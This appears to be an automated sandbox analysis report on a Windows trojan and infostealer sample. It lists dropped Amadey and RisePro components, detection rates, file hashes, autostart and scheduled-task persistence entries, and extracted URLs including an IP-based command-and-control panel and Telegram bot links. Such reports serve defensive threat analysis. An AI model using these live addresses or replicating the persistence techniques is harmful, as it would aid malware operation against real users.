C:\Users\user\AppData\Local\Temp\1000054001\amert.exe | 43% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe | 33% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe | 51% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | 77% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\1000188001\build12.exe | 77% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | 43% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | 82% | ReversingLabs | Win32.Trojan.Amadey |
C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll | 80% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll | 71% | ReversingLabs | Win64.Trojan.Amadey |
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll | 78% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 96% | ReversingLabs | Win32.Trojan.Amadey |
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 82% | Virustotal | | Browse

                              No Antivirus matches
                              No Antivirus matches
                                                                                                                                                                                                    https://t.me/RiseProSUPPORTYoMPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://t.me/risepro_botisepro_botPc884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.2784637428.0000029E81633000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://t.me/RiseProSUPPORT%c884f8452a.exe, 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://www.winimage.com/zLibDllDpITpIRageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                              https://ipinfo.io/Mozilla/5.0c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://193.233.132.56/Pneh2sXQk0/index.php?wal=1Erundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://t.me/RiseProSUPPORTrsMPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://193.233.132.56/esIrundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://t.me/risepro_botomaniac884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://ac.ecosia.org/autocomplete?q=c884f8452a.exe, 00000014.00000003.2968476956.0000000008136000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2963987119.0000000008128000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2975509031.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029768103.0000000007CC3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3036519526.0000000007D01000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3046918349.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3052160473.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3038281915.0000000007DE2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3042483731.000000000797B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000012.00000003.2839947296.0000014EAB7F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://t.me/risepro_botRageMP131.exe, 0000002D.00000002.3206727588.000000000181D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3206727588.0000000001815000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://t.me/risepro_botlaterMPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://www.youtube.com/account7831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://www.winimage.com/zLibDllc884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                                                    https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428500
Start date and time: 2024-04-19 03:27:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 21m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 59
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@106/196@19/15
EGA Information:
• Successful, ratio: 80%
HCA Information: Failed
Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 72.21.81.240, 192.229.211.108, 172.253.124.94, 173.194.219.101, 173.194.219.100, 173.194.219.138, 173.194.219.113, 173.194.219.139, 173.194.219.102, 142.250.105.84, 34.104.35.123, 74.125.138.94, 142.250.9.94, 142.250.9.95, 64.233.176.95, 173.194.219.95, 142.250.105.95, 172.217.215.95, 74.125.138.95, 64.233.185.95, 64.233.177.95, 172.253.124.95, 74.125.136.95, 23.33.136.127, 108.177.122.95, 142.251.15.95, 173.194.219.84, 64.233.176.84, 20.42.65.92, 142.250.105.94, 104.26.12.31, 104.26.13.31, 172.67.75.172, 74.125.136.139, 74.125.136.102, 74.125.136.113, 74.125.136.138, 74.125.136.100, 74.125.136.101, 172.253.124.84, 142.250.9.84
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, optimizationguide-pa.googleapis.com, www.bing.com, clients1.google.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com
                                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3176 because it is empty
                                                                                                                                                                                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type             Description
03:27:59  Task Scheduler   Run new task: explorha path: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
03:29:02  API Interceptor  13981199x Sleep call for process: explorha.exe modified
03:29:08  API Interceptor  18x Sleep call for process: powershell.exe modified
03:29:13  Task Scheduler   Run new task: chrosha path: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
03:29:16  API Interceptor  2x Sleep call for process: svchost.exe modified
03:29:17  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 831840b410.exe C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
03:29:23  Task Scheduler   Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
03:29:23  Task Scheduler   Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
03:29:27  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
03:29:35  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
03:29:42  API Interceptor  1467451x Sleep call for process: rundll32.exe modified
03:29:44  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 831840b410.exe C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe
03:29:52  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c884f8452a.exe C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
03:29:54  API Interceptor  3x Sleep call for process: WerFault.exe modified
03:30:00  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
03:30:02  API Interceptor  9859532x Sleep call for process: chrosha.exe modified
03:30:34  API Interceptor  1210269x Sleep call for process: build12.exe modified
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8e035783, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                      Entropy (8bit):0.6585568942777204
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                      MD5:E41C7683FE6C00EB1BD54BD0845BDE6D
                                                                                                                                                                                                                                      SHA1:961DDB52568A165F8D34CADD31D16A30133B5E10
                                                                                                                                                                                                                                      SHA-256:8FF38365FD6261B7D7C79E918926DEE5D52414D4721C3C9163BFC76E372499E7
                                                                                                                                                                                                                                      SHA-512:35B92F49BA9AFC34F20690A3641A3AE02CB623C1DB59D8714F4046DE00D0FEFA84BF44DF5B0A1A92BA3177C4F90798BB4C37B9C262E15926DD75A7AD09AA66E3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.0727488327709886
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:1j8laq+zU83d/005DDP6E6jjL67Zr9qWJzuiFmZ24IO8d6t:OaUCds05DD2jwJzuiFmY4IO8q
                                                                                                                                                                                                                                      MD5:EF0071FC0C6C5FB79571B93C03C16BD8
                                                                                                                                                                                                                                      SHA1:CBF2C416256E03E10C9F2E7DFAB04AEBE144BEAD
                                                                                                                                                                                                                                      SHA-256:288B5550C7A0182ED60ACEB8A932FF932E5B5BE19E3155DFC473866875A1746D
                                                                                                                                                                                                                                      SHA-512:67BA0EA556FCDE9977686EF3CD84B0188B8DA6A7B18FFC66FD3A509C5C1C093502704BCDE1BC3B66E5F42ADE85C455D1BE05E5C03E7B40022B5B5EA91F359C32
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.066097890821137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TwVl6q+z283d/005DDP6E6jjbdnZrxLZOzuiFmZ24IO8d6t:Mf62Cds05DD2jXOzuiFmY4IO8q
                                                                                                                                                                                                                                      MD5:ACD23DC53CDE78D410336A814F0A455A
                                                                                                                                                                                                                                      SHA1:15357AACFB2056AC09F87ADF48EC1708C7627920
                                                                                                                                                                                                                                      SHA-256:95C7B3A3E60720C8DF69D82B6A57191CA3483E6249C060585E84D4C4C21A250E
                                                                                                                                                                                                                                      SHA-512:E9B4485CA4D83A06ECD244D6C68C9B7B44BB4F3606C77EB686ECC23864BCB54C6E8FE88E30194B017D8E1C7B9FA3E03E610571E61F4396BF0F5230150F47AF42
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.082373971605741
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:kfBSgpaa3/s20/BC40IjL67Zr96nIzuiFmZ24IO8cE:rQ3Ud/BCEjJIzuiFmY4IO8d
                                                                                                                                                                                                                                      MD5:772644EE1E22A1D3A602AC993D1FCCA4
                                                                                                                                                                                                                                      SHA1:0394FC1F49FAECDDDBC87FA3C59E5C9092C11F2D
                                                                                                                                                                                                                                      SHA-256:DA0A1D9B35F17CB9D254AFA7D508DBB9C3B0B7DC5CCACC2DC4D6B98DDF41C9BB
                                                                                                                                                                                                                                      SHA-512:348A62AAED88A035CF397ABBC210D4CD4ECB9C9958F92BA06308DC6CD30D4332573EEE1945C703E1867F6273D84E5DC869B066F40A2DDB9636A014BA8383245D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.9.6.3.7.7.6.5.6.0.8.8.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.9.6.3.7.7.7.6.6.0.1.7.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.b.9.a.4.f.9.-.9.5.5.c.-.4.5.8.d.-.a.5.d.a.-.7.3.d.1.2.5.6.7.b.a.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.5.f.9.f.5.8.-.8.3.7.7.-.4.7.9.1.-.9.d.0.8.-.3.1.d.0.d.2.4.5.4.1.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.8.8.4.f.8.4.5.2.a...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.p.a...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.d.c.-.0.0.0.1.-.0.0.1.4.-.8.5.5.6.-.5.4.0.0.f.9.9.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.3.f.8.9.e.b.f.a.e.e.9.5.3.f.9.e.3.a.f.4.1.a.f.b.b.f.2.6.5.b.b.0.0.0.0.0.9.0.4.!.0.0.0.0.4.5.9.0.2.f.3.4.6.9.c.c.e.6.7.c.d.2.1.f.5.9.0.4.e.8.7.b.d.7.9.a.1.0.5.c.9.d.d.5.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 19 01:29:42 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):264092
                                                                                                                                                                                                                                      Entropy (8bit):1.4863952950372878
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:FF8biQW/VuW5vv5fxukkg/YMwf0CLEm2:F0G/VhH5peOgLv2
                                                                                                                                                                                                                                      MD5:C61D022BE478E360B5607B58735EE4AE
                                                                                                                                                                                                                                      SHA1:4643BF68A12F45A59D1F3E7CB3226842865091E5
                                                                                                                                                                                                                                      SHA-256:D42A5DAB6CA32518181025C0706DA405A1224616C60CF5F9D87E5A18BE0179FB
                                                                                                                                                                                                                                      SHA-512:684A6BE3F408429E9EE408DAAA69251326C6031E08AF1DF72DECF8C0F16DF59AAEEE0D7CAA2E8485A51F930ECDA27AD38BFDF37A2D3DD1DA21FD607B121EDD3A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6358
                                                                                                                                                                                                                                      Entropy (8bit):3.7290027711910176
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ+un6zYiZFJjmR8prP89b2Psf4Sm:R6lXJX6zY6FJjmP20fc
                                                                                                                                                                                                                                      MD5:F86338A08F8EECA3C7E49052669FF89B
                                                                                                                                                                                                                                      SHA1:5BED5569AA3B1CADE11B0261A88CB5BCC1E5EA4B
                                                                                                                                                                                                                                      SHA-256:38F5685864B4C610A028A457F573C5504E73FEB0E5C85C4EDA5FB2384F8757B2
                                                                                                                                                                                                                                      SHA-512:993AA410BE86B82292DC20F516AFC32F8C6E2D5B25342C4A3EB99E97F7073691C14D03E45E8F7372E6ABDE3D759BA9939B4D928A2B44C835BA01BFC7F63D49E9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.1.2.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4690
                                                                                                                                                                                                                                      Entropy (8bit):4.512732406719088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsuJg77aI9VyWpW8VYTYm8M4JBLF9j+q8cz5DmbDCkvsJd:uIjfkI7bT7VDJ9jb5DmbDCdJd
                                                                                                                                                                                                                                      MD5:31751BB67D89613E8C2E17EC52D3867B
                                                                                                                                                                                                                                      SHA1:BC5953A38DB732F36639DD52886E2FCBD1762BD9
                                                                                                                                                                                                                                      SHA-256:82EF089CDDDC1E350BC77795BE18F5F9F585232563AA52DFA26092F63F06E197
                                                                                                                                                                                                                                      SHA-512:BBD24B02A853825CFC993A143DB721DD399995DF91872A719CE184113D7EDFCCCD0645AE34F457DCF16CCCAFA30DE0804E276CE1B4B1ECACCB093BDE7C351B42
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Apr 19 01:29:43 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):254816
                                                                                                                                                                                                                                      Entropy (8bit):1.4894529367935254
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ScwlDEhK5vkTKjNiX9B4ZeqxMnHGDqSHkMDs:ScwNb8me9V8HX
                                                                                                                                                                                                                                      MD5:AEE60E775C99BB4B6F40F87D39866F18
                                                                                                                                                                                                                                      SHA1:D02FD24825B08483005E3C7F6C78F70C4730B31F
                                                                                                                                                                                                                                      SHA-256:0D2FBE26E8880755AE91960998795CAA42CE552BF103E888677E09C5151E7B60
                                                                                                                                                                                                                                      SHA-512:77FE8FA59102E5C772183837F1B0F8577B7E87FAF70FF78A42D676EE7A37B39067EC5AC2C4D6227BFE7517F0D0498960E4EE8301718C962127D9E18FEB89E613
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6358
                                                                                                                                                                                                                                      Entropy (8bit):3.729585051451638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJLuA6EjXYiZFJjmR8pr/89b/gsfCVm:R6lXJt6EjXY6FJjm//zfJ
                                                                                                                                                                                                                                      MD5:D3627EB2DC6C3B88DF4CE27B87B7DA46
                                                                                                                                                                                                                                      SHA1:3FDAC4CFDAE12DB90DB80E35ECC2F6222BBCE066
